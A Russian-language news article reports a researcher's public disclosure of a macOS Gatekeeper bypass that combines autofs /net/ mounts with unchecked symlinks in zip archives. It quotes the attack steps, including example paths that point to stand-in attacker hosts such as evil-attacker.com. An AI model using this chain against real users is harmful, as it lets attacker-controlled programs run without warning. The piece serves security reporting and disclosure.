Исследователь раскрывает уязвимость в механизме безопасности macOS Gatekeeper

0
60

Исследователь безопасности Филиппо Кавалларин обнародовал то, что по его словам, является рабочим способом обойти функциональность безопасности Gatekeeper вашей macOS. Даже после выпуска MacOS 10.14.5, появившегося на прошлой неделе, этот способ все еще остается без внимания.

Gatekeeper — это инструмент безопасности macOS, который проверяет приложения сразу после их загрузки. Это предотвращает запуск нежелательных приложений без согласия пользователя. Когда пользователь загружает приложения из-за пределов Mac App Store, Gatekeeper мгновенно используется для проверки подписи кода. В случае, код не был подписан, приложение попросту не будет открыто без прямого разрешения пользователя.

В своем блоге Кавалларин уточняет, что функциональность Gatekeeper может быть полностью обманута. В своей текущей реализации Gatekeeper рассматривает внешние накопители и сетевые ресурсы как «безопасные расположения». Это означает, что он позволяет запускать любое приложение, размещенное в этих директориях, без повторной проверки кода. Далее он поясняет, что пользователь может «запросто» быть обманутым при подключении к сетевому общему диску, и что все, что находится в этой папке, может затем пройти через Gatekeeper.

Исследователь безопасности объясняет:

Первой легальной функцией является автомонтирование (также называемое autofs), которое позволяет пользователю автоматически монтировать сетевой ресурс, просто используя «специальный» путь, в данном случае любой путь, начинающийся с «/ net /».

Например, «ls /net/evil-attacker.com/sharedfolder/» заставит ОС читать содержимое «sharedfolder» на удаленном хосте (evil-attacker.com) с использованием NFS.

Второе свойство заключается в том, что zip-архивы могут содержать символические ссылки, указывающие на абсолютно произвольное местоположение (включая точки автоматического монтирования), и что программное обеспечение вашей MacOS, отвечающее за распаковку zip-файлов, не выполняет совершенно никакой проверки символических ссылок перед их созданием.

Пример того, как это будет работать:

Чтобы лучше понять, как работает этот эксплойт, давайте рассмотрим следующий сценарий: злоумышленник создает zip-файл, содержащий символическую ссылку на конечную точку автомонтирования, которой он / она управляет (ex Documents -> /net/evil.com/Documents), и отправляет ее в жертва.

Жертва скачивает вредоносный архив, извлекает его и переходит по символической ссылке.

Теперь жертва находится в месте, контролируемом злоумышленником, но которому доверяет Gatekeeper, поэтому любой контролируемый злоумышленником исполняемый файл может быть запущен без предупреждения. Способ, которым разработан Finder (например, скрыть расширения .app, скрыть полный путь от заголовка), делает эту технику очень эффективной и трудной для обнаружения.

Кавалларин говорит, что он сообщил Apple об этом недостатке еще 22 февраля, и что компания должна была решить эту проблему с выпуском macOS 10.14.5, вышедшей на прошлой неделе. Тем не менее, на момент релиза лазейка по-прежнему остается без внимания, а Кавалларин заявляет, что компания Apple и вовсе перестала отвечать на его электронные письма. Он публикует информацию о данном недостатке, поскольку 90-дневное окно, которое он дал компании из Купертино «уже захлопнулось».

Ниже вы самы можете познакомиться с видео демонстрацией описанного недостатка:

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here